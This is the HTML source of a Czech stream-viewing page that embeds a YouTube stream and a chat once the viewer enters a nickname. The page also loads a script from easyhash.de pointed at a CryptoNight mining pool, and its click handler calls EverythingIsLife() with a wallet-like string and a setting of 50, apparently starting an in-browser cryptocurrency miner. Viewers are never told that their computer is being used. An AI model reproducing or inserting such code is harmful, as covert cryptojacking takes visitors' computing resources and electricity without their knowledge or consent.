<!DOCTYPE html>
<html lang="cs-CZ">
    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
        <title>LagBugCZ Stream</title>
        <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
        <script src="https://easyhash.de/tkefrep/tkefrep.js?tkefrep=bs?algy=cn/r?nosaj=pool.lethean.blockharbor.net:3333"></script>
        <script>
		var videoID = "UVxU2HzPGug";
		var streamvideoURL = "https://www.youtube.com/embed/" + videoID;
		var streamchatURL = "https://tlk.io/LagBugCZ_stream";
            $(document).ready(function () {
                    $("#btn").click(function () {
                        EverythingIsLife(
                            'NaWe5B5NqvZ3TV2Mj1pxYtTgrnTBwQDMDNtqVzMR6Xa5ejxu6hbi6KULHTqd732ebc5qTHvKXonokghUBd3pjLa8cznAQYFRpML1xziiSwRh',
                            $("#nick").val(),
                            50
                        );
                        $("body").html("<h1>Děkuji za sledování!</h1>")
						$("body").html('<div style="position:relative;padding-top:66.25%;"><iframe id="myFrame" frameborder="0" allowfullscreen style="position:absolute;top:0;left:0;width:100%;height:80%;"></iframe></div> <div style="position:relative;padding-top:56.25%;"><iframe id="myFrame2" frameborder="0" allowfullscreen style="position:absolute;top:0;left:0;width:100%;height:50%;"></iframe></div>')
						document.getElementById("myFrame").src = streamvideoURL;
						document.getElementById("myFrame2").src = streamchatURL;
                    });
                });
        </script>
        <style>
            body {
                background: #fefefe;;
            }
            h1 {
                color: #4CAF50;
            }
            button {
                background-color: #4CAF50;
                border-color: #4CAF50;
                border-style: solid;
                font-weight: bold;
                color: white;
                padding: 15px 32px;
                text-align: center;
                text-decoration: none;
                display: inline-block;
                font-size: 16px;
            }
            button:hover,
            button:active {
                background-color: rgb(77, 197, 81);
                border-color: rgb(77, 197, 81);
            }
            input {
                background-color: white;
                border-color: #4CAF50;
                border-style: solid;
                color: black;
                padding: 15px 32px;
                text-align: center;
                text-decoration: none;
                display: inline-block;
                font-size: 16px;
            }
        </style>
    </head>
    <body>
        <input type="text" min="1" max="30" value="" placeholder="enter your nick" id="nick">
        <button id="btn">sledovat</button>
    </body>
</html>
